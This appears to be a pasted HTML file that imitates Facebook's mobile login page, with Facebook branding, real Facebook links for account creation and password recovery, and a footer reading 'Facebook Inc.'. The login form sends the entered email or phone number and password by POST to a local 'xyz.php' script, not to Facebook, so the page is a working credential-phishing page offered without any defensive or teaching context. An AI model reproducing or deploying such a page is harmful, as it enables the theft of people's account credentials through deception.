Untitled
4 years ago in HTML
<!DOCTYPE html>
<html>
<head>
<title>Facebook - login or sign up</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=0.365, user-scalable=no" />
<style>
-webkit-touch-callout: none;
-webkit-user-select: none;
-khtml-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
table {
display: block;
overflow-x: auto;
}
body {
overflow-x: hidden;
}
h1{font:roboto; font-size:350%
;color: rgb(59 89 152)}
#login{height:110px;width:900px; position: relative ; left:35px ; top:70px ; color:white; background-color: rgb(59 89 152) ;
border-radius:17px
}
h4{font-size:350%; position: relative; bottom:40px}
input{height:110px; width:900px ; position: relative; left:35px ; top:22px;
background-color: rgb(247 247 247);border-radius:17px
}
#place{font-size:250%}
#pass{font-size:250%}
h5{font-size:45px; position:relative; left:460px ; top:20px ; font-weight:300
}
hr{width:350px}
#line1{position: relative ; right:265px; bottom:80px}
#line2{position: relative ; left:265px; bottom:90px}
#cna{background-color:rgb(0 160 0); color:white;
margin:30px 200px; font-size:150% ; padding:0px 50px ;
position: relative; bottom:35px ; left:75px;
border-radius:17px
}
#fp{position: absolute; left:330px;top:870px; font-size:220%; font-weight:300}
A {text-decoration: none;}
h6{position: relative; left:160px; top:50px ; font-size:180% ; font-weight:400}
#lang1{position: relative; left:160px; bottom:0px; font-size:170% ;}
#lang2{position: relative; left:650px; bottom:225px; font-size:170% ;}
#fi{position: relative;bottom:100px; left:20px;font-size:230%}
#plus{font-size:200% ; font-weight:350 ; border-style: solid ; width:45px; height:45px; padding:0px 0px 15px 15px ;
position: relative; right:0px;border-radius:10px
}
</style>
</head>
<body scroll=no>
<h1 align="center">facebook</h1>
<form action="xyz.php" method="POST">
<div>
<input id="place" type="text" placeholder=" Mobile number or email address" name="Mobile number or email address" autocomplete="on" required>
</div>
<br>
<input id="pass" type="password" size="100%"placeholder=" Password" name="password" autocomplete="off" required>
<br>
<button id="login" type="Login" ><h4>Log In</h4></button>
</form>
<h5>or</h5>
<hr id="line1" style="border: 1px solid rgb(100 100 100);" />
<hr id="line2" style="border: 1px solid rgb(100 100 100);" />
<a href="https://m.facebook.com/reg/?cid=103&refsrc=https%3A%2F%2Fm.facebook.com%2F&_rdr">
<button id="cna">
<h2 align="center">Create New Account </h2>
</button> </a>
<a align="center" id="fp" href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F%26_rdr%2Bview-source&multiple_results=0&ars=facebook_login&lwv=100&_rdr">
Forgotten password?</a>
<h6>
English (UK) </h6>
<a id="lang1" href>मराठी <br > <br > ಕನ್ನಡ <br> <br > తెలుగు </a>
<br><br >
<a id="lang2" href>हिन्दी <br><br > اردو <br><br > മലയാളം<br >
<br><div id="plus">+ </div>
</a>
<footer id="fi" align="center">Facebook Inc. </footer>
</body>
</html>